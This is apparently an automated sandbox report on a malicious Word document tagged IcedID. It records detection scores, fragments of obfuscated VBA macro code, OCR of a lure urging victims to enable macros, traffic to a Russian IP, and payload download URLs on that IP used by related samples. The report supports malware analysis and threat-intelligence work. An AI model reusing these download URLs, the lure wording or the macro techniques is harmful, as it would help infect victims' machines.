Edit tour

Windows Analysis Report
suddenlink.doc.08.11.22.doc

Overview

General Information

Sample Name:	suddenlink.doc.08.11.22.doc
Analysis ID:	682722
MD5:	13f0a9bd5a2a4fd90924a953eb9b1642
SHA1:	bb6d3ab2c01d3058964cd6493a691ad9971307ca
SHA256:	04042893124fdbf007cfdb673ef878ac9a47f37f871c1e5322ec46945915abc1
Tags:	docIcedID
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Multi AV Scanner detection for submitted file

Document contains an embedded VBA macro with suspicious strings

Machine Learning detection for sample

Potential document exploit detected (unknown TCP traffic)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

IP address seen in connection with other malware

Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 204 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: suddenlink.doc.08.11.22.doc	Virustotal: Detection: 24%			Perma Link
Source: suddenlink.doc.08.11.22.doc	ReversingLabs: Detection: 17%

Machine Learning detection for sample

Source: suddenlink.doc.08.11.22.doc

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 45.8.146.139:80

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80

Source: Joe Sandbox View	IP Address: 45.8.146.139 45.8.146.139
Source: Joe Sandbox View	IP Address: 45.8.146.139 45.8.146.139

Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E9ED2FB3-553A-41AD-8A8D-A96BE0FFFE15}.tmp

Jump to behavior

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable editing" button on W a the top bar, and then click"Enable content". . G m W ' - - 0 0"
Source: Screenshot number: 4	Screenshot OCR: Enable content". . G m W ' - - 0 0"0'0000 .0 om Dru ~ "' ' " " " ;&r'T'^ - . mm i = ,, .
Source: Screenshot number: 8	Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content". "a ii: ^ _ : ' M 00 mj
Source: Screenshot number: 8	Screenshot OCR: Enable content". "a ii: ^ _ : ' M 00 mj @,1

Document contains an embedded VBA macro with suspicious strings

Source: suddenlink.doc.08.11.22.doc	OLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: suddenlink.doc.08.11.22.doc	OLE, VBA macro line: Set = CallByName((), OSxlmNJ3q("mwRAMK1OR"), VbGet, )
Source: suddenlink.doc.08.11.22.doc	OLE, VBA macro line: Set = CallByName((OSxlmNJ3q("AcuNyImcre")), OSxlmNJ3q("WHT_CMO"), VbGet, OSxlmNJ3q("GGHh4jSO_"))
Source: suddenlink.doc.08.11.22.doc	OLE, VBA macro line: Set = CallByName((), OSxlmNJ3q("BdCiDEvWAY"), VbGet, )
Source: ~DF6C958FC245A84978.TMP.0.dr	OLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: ~DF6C958FC245A84978.TMP.0.dr	OLE, VBA macro line: Set = CallByName((), OSxlmNJ3q("mwRAMK1OR"), VbGet, )
Source: ~DF6C958FC245A84978.TMP.0.dr	OLE, VBA macro line: Set = CallByName((OSxlmNJ3q("AcuNyImcre")), OSxlmNJ3q("WHT_CMO"), VbGet, OSxlmNJ3q("GGHh4jSO_"))
Source: ~DF6C958FC245A84978.TMP.0.dr	OLE, VBA macro line: Set = CallByName((), OSxlmNJ3q("BdCiDEvWAY"), VbGet, )

Source: suddenlink.doc.08.11.22.doc	OLE, VBA macro line: Private Sub Document_Open()
Source: ~DF6C958FC245A84978.TMP.0.dr	OLE, VBA macro line: Private Sub Document_Open()

Source: suddenlink.doc.08.11.22.doc	OLE indicator, VBA macros: true
Source: ~DF6C958FC245A84978.TMP.0.dr	OLE indicator, VBA macros: true

Source: ~WRF{7363718C-0FC5-4461-9EF0-562FC1188CC7}.tmp.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF6C958FC245A84978.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: suddenlink.doc.08.11.22.doc	Virustotal: Detection: 24%
Source: suddenlink.doc.08.11.22.doc	ReversingLabs: Detection: 17%

Source: suddenlink.doc.08.11.22.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\suddenlink.doc.08.11.22.doc

Source: suddenlink.doc.08.11.22.doc

OLE indicator, Word Document stream: true

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ddenlink.doc.08.11.22.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR54C3.tmp

Jump to behavior

Source: classification engine

Classification label: mal64.expl.winDOC@1/11@0/1

Source: suddenlink.doc.08.11.22.doc	OLE document summary: title field not present or empty
Source: suddenlink.doc.08.11.22.doc	OLE document summary: author field not present or empty
Source: suddenlink.doc.08.11.22.doc	OLE document summary: edited time not present or 0
Source: ~WRF{7363718C-0FC5-4461-9EF0-562FC1188CC7}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{7363718C-0FC5-4461-9EF0-562FC1188CC7}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{7363718C-0FC5-4461-9EF0-562FC1188CC7}.tmp.0.dr	OLE document summary: edited time not present or 0
Source: ~DF6C958FC245A84978.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DF6C958FC245A84978.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DF6C958FC245A84978.TMP.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: suddenlink.doc.08.11.22.doc

Initial sample: OLE zip file path = docProps/custom.xml

Source: suddenlink.doc.08.11.22.doc

Static file information: File size 2315700 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ~WRF{7363718C-0FC5-4461-9EF0-562FC1188CC7}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	12 Scripting	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	1 File and Directory Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Exploitation for Client Execution	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	1 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	12 Scripting	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
suddenlink.doc.08.11.22.doc	25%	Virustotal		Browse
suddenlink.doc.08.11.22.doc	18%	ReversingLabs	Script-Macro.Trojan.Amphitryon
suddenlink.doc.08.11.22.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\~DF6C958FC245A84978.TMP	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.8.146.139	unknown	Russian Federation		44676	VMAGE-ASRU	false

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	682722
Start date and time:	2022-08-11 21:47:33 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	suddenlink.doc.08.11.22.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Run name:	Without Instrumentation
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.expl.winDOC@1/11@0/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .doc Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.8.146.139	valliant.document.08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f
	suddenlink file 08.11.22.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/U-CXQ4A0CVQ_DMT42DN0TYZCE_E_1XMH/-f
	cnewton doc 08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
	suddenlink file 08.11.22.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/U-CXQ4A0CVQ_DMT42DN0TYZCE_E_1XMH/-f
	valliant.document.08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f
	valliant.document.08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f
	cnewton doc 08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
	cnewton doc 08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
	airequipmentcorp-doc-08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
	wpswireless-invoice-08.11.22.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
	airequipmentcorp-doc-08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
	airequipmentcorp-doc-08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
	wpswireless-invoice-08.11.22.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
	wpswireless-invoice-08.11.22.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
	courtesyautomotivedoc08.11.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll
	drinkcodeblue.file.08.11.22.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/IJQ_OLG8QW9DFH32ZO8BOJQ-PC_3SXMS/rm
	dodsonimaging,file,08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
	feltenberger doc 08.11.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/R_PVSJYED3P2FDSONZYADP8GFZZLOA8D/loader_p3_dll_64_n5_crypt_x64_asm_clone_n101.dll
	agsilverfile08.11.doc	Get hash	malicious	Browse	45.8.146.139/fhfty/A0S35FRY5H5A0Q5SG6-TE3J_HSFO5KES/loader_p3_dll_64_n5_crypt_x64_asm_clone_n19.dll

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VMAGE-ASRU	ajhsolutions.invoice.08.11.doc	Get hash	malicious	Browse	45.8.146.139
	suddenlinkdocument08.11.22.doc	Get hash	malicious	Browse	45.8.146.139
	suddenlinkfile08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139
	suddenlink.doc.08.11.22.doc	Get hash	malicious	Browse	45.8.146.139
	suddenlinkdocument08.11.22.doc	Get hash	malicious	Browse	45.8.146.139
	suddenlink.doc.08.11.22.doc	Get hash	malicious	Browse	45.8.146.139
	suddenlinkfile08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139
